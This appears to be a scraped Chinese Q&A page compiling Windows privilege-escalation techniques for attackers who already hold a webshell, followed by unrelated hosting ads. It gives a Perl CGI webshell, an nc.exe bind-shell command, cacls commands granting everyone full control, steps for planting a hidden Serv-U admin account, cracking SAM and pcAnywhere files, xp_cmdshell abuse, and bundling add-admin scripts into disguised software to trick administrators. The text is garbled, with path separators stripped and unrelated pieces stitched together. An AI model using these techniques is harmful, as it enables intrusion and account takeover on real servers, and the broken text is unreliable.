pcanywhere提权windows 提权命令是什么?

pcanywhere提权  时间:2021-10-01  阅读:()

得到wedshell后怎么提权啊

本篇文章结合了许多高手提升权限的技巧和自己的一些想法 当我们取得一个webshell时候,下一部要做的就是提升权限 个人总结如下: 1: C:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere 看能 否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆 2.C:WINNTsystem32config进这里下它的SAM,破解用户的密码 c:winnt epaire 下是备份 用到破解sam密码的软件有LC,SAMinside 3.C:Documents and SettingsAll Users「开始」菜单程序 看这里能跳转不,我们从这里 可以获取好多有用的信息 可以看见好多快捷方式,我们一般选择Serv-U的,然后本地查看属性,知道路径后,看能否 跳转 进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空 [USER=dede|1] Password= HomeDir=c: TimeOut=600 Maintenance=System ess1=C:|RWAMELCDP ess1=d:|RWAMELCDP ess1=f:|RWAMELCDP SKEYValues= 这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限 ServUAdmin.ini ServUDaemon.ini 4.c:winntsystem32srvdata就是这个目录,同样是erveryone 完全控制,我们所要做 的就是把提升权限的工具上传上去,然后执行 5.看能否跳转到如下目录 c:php, 用phpspy c:prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell #!/usr/bin/perl binmode(STDOUT); syswrite(STDOUT, "Content-type: text/html ", 27); $_ = $ENV{QUERY_STRING}; s/%20/ /ig; s/%2f///ig; $execthis = $_; syswrite(STDOUT, " ", 13); open(STDERR, ">&STDOUT") || die "Can't redirect STDERR"; system($execthis); syswrite(STDOUT, " ", 17); close(STDERR); close(STDOUT); exit; 保存为cgi执行, 如果不行,可以试试 pl 扩展呢,把刚才的 cgi 文件改为 pl 文件,提交 mand" Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe" 现在是 IUSR 权限,提交: http://anyhost//cmd.pl?cperlinsu.exe "cacls.exe c: /E /T /G everyone:F" http://anyhost//cmd.pl?cperlinsu.exe "cacls.exe d: /E /T /G everyone:F" http://anyhost//cmd.pl?cperlinsu.exe "cacls.exe e: /E /T /G everyone:F" http:/

域用户怎样给自己提权?

自己是没办法提权的,只有让管理员“帮你提权”!方法很多,你可以写一些添加管理员或者提权的脚本诱惑管理员打开或者放在开始菜单的启动文件夹里让管理员重启动时脚本自动运行,我推荐你用捆绑的方法,这样不易被发现。

需要:一个.bat文件(cmd批处理:功能是添加用户并提权), 一个.vbs文件(vbs脚本:功能主要是让bat后台运行,不弹出cmd窗口), 一个管理员常用的软件, 然后用windows自带的捆绑软件(在运行里输入 iexpress)把以上三个文件捆绑成一个文件并设置运行顺序(首先运行vbs,然后运行软件)。

呵呵,具体的脚本命令你可以在网上搜,不会了再问我! 如果想弄的天衣无缝的话,建议:1.捆绑应用软件前先备份 2.捆绑后,用一个图标修改软件把捆绑后的软件图标修改成和以前一样的 3.提权后(管理员运行后)把备份的软件替换回来(不然的话,如果是重复添加相同用户可能会报错) 4.如果是新添加了一个管理员用户,这样很容易被发现,建议进行把该账号进行隐藏和克隆。

呵呵,以上技术只供研究,不提倡使用! 这和“公司的电脑都没光驱或软驱”没什么联系。

拿到webshell后如何提权拿下他的服务器?

以下全部是入侵提权的一些总结,很多方法至今没有机会试验也不一定成功,但是我是的确看见别人成功过的。

现在贴出一些别人的经验总结。

希望对朋友有帮助! 1.radmin连接法 条件是你权限够大,对方连防火墙也没有。

封装个radmin上去,运行,开对方端口,然后radmin上去。

本人从来没成功过,端口到是给对方打开了。

2.paanywhere C:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere 这里下他的GIF文件,在本地安装pcanywhere上去。

3.SAM破解 C:WINNTsystem32config 下他的SAM 破解之。

4.SU密码夺取 C:Documents and SettingsAll Users「开始」菜单程序引用:Serv-U,然后本地查看属性,知道路径后,看能否跳转。

进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空。

[USER=WekweN|1] Password= HomeDir=c: TimeOut=600 Maintenance=System ess1=C:|RWAMELCDP ess1=d:|RWAMELCDP ess1=f:|RWAMELCDP SKEYValues= 这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限。

5.c:winntsystem32srvdata 引用:就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行。

6.SU溢出提权 这个网上教程N多,不详细讲解了。

7.运行Csript 引用:运行"cscript C:pubAdminScriptsadsutil.vbs get w3svc/inprocessisapiapps"来提升权限。

用这个cscript C:pubAdminScriptsadsutil.vbs get w3svc/inprocessisapiapps ,查看有特权的dll文件:idq.dll srvasp.dll (不同的机子放的位置不一定一样),我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:WINNTsystem32idq.dll" "C:WINNTsystem32srvsrvsrvssinc.dll" "C:WINNTsystem32msw3prt.dll""c:winntsystem32srvasp.dll" 。

可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了。

8.脚本提权 c:Documents and SettingsAll Users「开始」菜单程序启动"写入bat,vbs。

9.VNC 默认情况下VNC密码存放在HKCUSoftwareORLWinVNC3Password,我们可以用vncx4破解它。

vncx4使用很简单,只要在命令行下输入: c:>vncx4 -W 然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。

10.NC提权 给对方来个NC,但是条件是你要有足够的运行权限,然后把它反弹到自己的电脑上。

11.社会工程学之GUEST提权 很简单,查看他的用户。

一般来说看到帐户以后,密码尽量猜。

可能用户密码一样,也可能是他QQ号、邮箱号、手机号。

尽量看看。

12.IPC空连接 如果对方真比较白痴的话,扫他的IPC,如果运气好还是弱口令。

13.替换服务 这个不用说了吧?个人感觉相当复杂。

14.autorun .inf autorun=xxx.exe,这个=后面自己写。

加上只读、系统、隐藏属性,传到哪个盘都可以的,不相信他不运行。

.ini与Folder.htt 引用:首先,我们现在本地建立一个文件夹,名字不重要。

进入它,在空白处点右键,选择“自定义文件夹”(xp好像是不行的)一直下点,默认即可。

完成后,你就会看到在此目录下多了两个名为Folder setting的文件架与.ini的文件,(如果你看不到,先取消“隐藏受保护的操作系统文件”),然后我们在Folder setting目录下找到Folder.htt文件,记事本打开。

在任意地方加入以下代码:,然后你将你的后门文件放在Folder setting目录下,把此目录与.ini一起上传到对方任意一个目录下,就可以了。

只要等管理员浏览了此目录,它就执行了我们的后门。

16.su覆盖提权 本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini 覆盖掉,重起一下Serv-U,于是你上面的所有配置都与他的一模一样了。

17.SU转发端口 43958这个是 Serv -U 的本地管理端口,FPIPE.exe上传他,执行命令: Fpipe ?Cv ?Cl 3333 ?Cr 43958 127.0.0.1 意思是将4444端口映射到43958端口上。

然后就可以在本地安装一个Serv-u,新建一个服务器,IP填对方IP,帐号为LocalAdministrator 密码为$ak#.1k;0@p">#1@$ak#.1k;0@p,连接上后你就可以管理他的Serv-u了。

18.SQL帐户密码泄露 如果对方开了MSSQL服务器,我们就可以通过用SQL连接器加管理员帐号(可以从他的连接数据库的ASP文件中看到),因为MSSQL是默认的SYSTEM权限。

引用:对方没有删除xp_cmdshell方法:使用Sqlexec.exe,在host一栏中填入对方IP,User与Pass中填入你所得到的用户名与密码。

format选择xp_cmdshell”%s”即可。

然后点击connect,连接上后就可以在CMD一栏中输入你想要的CMD命令了。

19.asp.dll 引用:因为asp.dll是放在c:winntsystem32srvasp.dll (不同的机子放的位置不一定相同),我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:WINNTsystem32idq.dll" "C:WINNTsystem32srvsrvsrvssinc.dll" "C:WINNTsystem32msw3prt.dll""c:winntsystem32srvasp.dll"。

好了,现在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去 了。

注意,用法中的get和set,一个是查看一个是设置,还有就是你运行上面的你要到C:pubAdminScripts>这个目录下。

那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把asp.dll 剔出特权一族。

也就是用set这个命令,覆盖掉刚才的那些东东。

windows 提权命令是什么?

进入纯DOS(MSDOS中我没有试过),新建一个用户和密码,或者使用你原来的这个也是可以的,并把这个账号提升到管理员权限.命令是:建立用户账号,NET USER 用户名 密码 /ADD 提升权限用NET LOCALGROUP ADMINISTRATORS 用户名 /ADD.记住那个/ADD一定要加的,因为那是强制执行.

零途云月付31.9元起,香港cn2 gia线路

零途云是一家香港公司,主要产品香港cn2 gia线路、美国Cera线路云主机,美国CERA高防服务器,日本CN2直连服务器;同时提供香港多ip站群云服务器。即日起,购买香港/美国/日本云服务器享受9折优惠,新用户有优惠码:LINGTUYUN,使用即可打折。目前,零途云还推出性价比非常高香港多ip站群云服务器,有需要的,可以关注一下。零途云优惠码:优惠码:LINGTUYUN (新用户优惠,享受9折优...

易探云月付18元起,香港/美国/深圳/北京VPS,CN2、BGP等多线路

易探云怎么样?易探云是国内一家云计算服务商家,致力香港服务器、国内外服务器租用及托管等互联网业务,目前主要地区为运作香港BGP、香港CN2、广东、北京、深圳等地区。易探云服务器均选择当下热门线路,比如CN2 GIA、BGP线路、CN2线路等,所有云主机支持月付,并且首月优惠,年付优惠,优惠后香港沙田云服务器/独立ip/香港CN2线路,每月仅18元,188元/年。点击进入:易探云官方网站地址1、香港...

优林70/月,西南高防地区最低70/月

优林怎么样?优林好不好?优林 是一家国人VPS主机商,成立于2016年,主营国内外服务器产品。云服务器基于hyper-v和kvm虚拟架构,国内速度还不错。今天优林给我们带来促销的是国内西南地区高防云服务器!全部是独享带宽!续费同价!官方网站:https://www.idc857.com​地区CPU内存硬盘流量带宽防御价格购买地址德阳高防4核4g50G无限流量10M100G70元/月点击购买德阳高防...

pcanywhere提权为你推荐
ros驱动电机ROS怎么装网卡驱动宾馆客房管理系统酒店客房控制系统是不是管理系统杭州工作室我想找杭州最好的摄影工作室洛奇英雄传s2洛奇英雄传有办法不交s2的任务,然后反复刷s2的图吗?例外招聘深圳富市康还招工吗是不是只要女孩不要男孩的呢,待遇好吗?csol进不去csol怎么进不去香港大陆香港和大陆有什么不同呼叫中心系统搭建公司想建个呼叫中心系统,很急,哪的系统好,又快?wosign除了wosign证书,还有哪些ganesha泰国综艺坐气球是什么节目?
代理主机 虚拟主机管理软件 华众虚拟主机管理系统 ip反查域名 免费申请域名和空间 企业主机 罗马假日广场 国内免备案主机 美国主机评测 godaddy域名优惠码 2017年黑色星期五 创宇云 好玩的桌面 京东云擎 好看的桌面背景大图 线路工具 商家促销 七夕促销 me空间社区 美国网站服务器 更多